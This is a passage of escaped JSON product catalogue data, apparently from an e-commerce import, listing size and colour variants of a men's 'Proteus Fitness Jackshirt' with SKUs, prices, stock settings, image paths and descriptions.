l\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj12-orange_alt1.jpg,\\/m\\/j\\/mj12-orange_back.jpg\",\"image\":\"\\/m\\/j\\/mj12-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj12-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj12-orange_alt1.jpg,\\/m\\/j\\/mj12-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"374\":{\"sku\":\"MJ12-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Proteus Fitness Jackshirt-M-Black\",\"description\":\"<p>Part jacket, part shirt, the Proteus Fitness Jackshirt makes an ideal companion for outdoor training, camping or loafing on crisp days. Natural Cocona&reg; technology brings breathable comfort and increased dryness along with UV protection and odor management. The drop-tail hem provides extra coverage when you\'re riding a bike or replacing a sink valve.<\\/p>\\n<p>&bull; 1\\/4 zip. Stand-up collar. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Quilted inner layer.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"proteus-fitness-jackshirt-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"375\":{\"sku\":\"MJ12-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Proteus Fitness Jackshirt-M-Blue\",\"description\":\"<p>Part jacket, part shirt, the Proteus Fitness Jackshirt makes an ideal companion for outdoor training, camping or loafing on crisp days. Natural Cocona&reg; technology brings breathable comfort and increased dryness along with UV protection and odor management. The drop-tail hem provides extra coverage when you\'re riding a bike or replacing a sink valve.<\\/p>\\n<p>&bull; 1\\/4 zip. Stand-up collar. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Quilted inner layer.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"proteus-fitness-jackshirt-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"376\":{\"sku\":\"MJ12-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Proteus Fitness Jackshirt-M-Orange\",\"description\":\"<p>Part jacket, part shirt, the Proteus Fitness Jackshirt makes an ideal companion for outdoor training, camping or loafing on crisp days. Natural Cocona&reg; technology brings breathable comfort and increased dryness along with UV protection and odor management. The drop-tail hem provides extra coverage when you\'re riding a bike or replacing a sink valve.<\\/p>\\n<p>&bull; 1\\/4 zip. Stand-up collar. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Quilted inner layer.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"proteus-fitness-jackshirt-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj12-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj12-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj12-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj12-orange_alt1.jpg,\\/m\\/j\\/mj12-orange_back.jpg\",\"image\":\"\\/m\\/j\\/mj12-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj12-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj12-orange_alt1.jpg,\\/m\\/j\\/mj12-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"377\":{\"sku\":\"MJ12-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Proteus Fitness Jackshirt-L-Black\",\"description\":\"<p>Part jacket, part shirt, the Proteus Fitness Jackshirt makes an ideal companion for outdoor training, camping or loafing on crisp days. Natural Cocona&reg; technology brings breathable comfort and increased dryness along with UV protection and odor management. The drop-tail hem provides extra coverage when you\'re riding a bike or replacing a sink valve.<\\/p>\\n<p>&bull; 1\\/4 zip. Stand-up collar. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Quilted inner layer.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"proteus-fitness-jackshirt-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"378\":{\"sku\":\"MJ12-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Proteus Fitness Jackshirt-L-Blue\",\"description\":\"<p>Part jacket, part shirt, the Proteus Fitness Jackshirt makes an ideal companion for outdoor training, camping or loafing on crisp days. Natural Cocona&reg; technology brings breathable comfort and increased dryness along with UV protection and odor management. The drop-tail hem provides extra coverage when you\'re riding a bike or replacing a sink valve.<\\/p>\\n<p>&bull; 1\\/4 zip. Stand-up collar. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Quilted inner layer.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"proteus-fitness-jackshirt-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"379\":{\"sku\":\"MJ12-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Proteus Fitness Jackshirt-L-Orange\",\"description\":\"<p>Part jacket, part shirt, the Proteus Fitness Jackshirt makes an ideal companion for outdoor training, camping or loafing on crisp days. Natural Cocona&reg; technology brings breathable comfort and increased dryness along with UV protection and odor management. The drop-tail hem provides extra coverage when you\'re riding a bike or replacing a sink valve.<\\/p>\\n<p>&bull; 1\\/4 zip. Stand-up collar. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Quilted inner layer.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"proteus-fitness-jackshirt-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj12-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj12-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj12-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj12-orange_alt1.jpg,\\/m\\/j\\/mj12-orange_back.jpg\",\"image\":\"\\/m\\/j\\/mj12-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj12-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj12-orange_alt1.jpg,\\/m\\/j\\/mj12-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"380\":{\"sku\":\"MJ12-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Proteus Fitness Jackshirt-XL-Black\",\"description\":\"<p>Part jacket, part shirt, the Proteus Fitness Jackshirt makes an ideal companion for outdoor training, camping or loafing on crisp days. Natural Cocona&reg; technology brings breathable comfort and increased dryness along with UV protection and odor management. The drop-tail hem provides extra coverage when you\'re riding a bike or replacing a sink valve.<\\/p>\\n<p>&bull; 1\\/4 zip. Stand-up collar. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Quilted inner layer.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"proteus-fitness-jackshirt-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"381\":{\"sku\":\"MJ12-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Proteus Fitness Jackshirt-XL-Blue\",\"description\":\"<p>Part jacket, part shirt, the Proteus Fitness Jackshirt makes an ideal companion for outdoor training, camping or loafing on crisp days. Natural Cocona&reg; technology brings breathable comfort and increased dryness along with UV protection and odor management. The drop-tail hem provides extra coverage when you\'re riding a bike or replacing a sink valve.<\\/p>\\n<p>&bull; 1\\/4 zip. Stand-up collar. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Quilted inner layer.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"proteus-fitness-jackshirt-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"382\":{\"sku\":\"MJ12-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Proteus Fitness Jackshirt-XL-Orange\",\"description\":\"<p>Part jacket, part shirt, the Proteus Fitness Jackshirt makes an ideal companion for outdoor training, camping or loafing on crisp days. Natural Cocona&reg; technology brings breathable comfort and increased dryness along with UV protection and odor management. The drop-tail hem provides extra coverage when you\'re riding a bike or replacing a sink valve.<\\/p>\\n<p>&bull; 1\\/4 zip. Stand-up collar. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Quilted inner layer.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 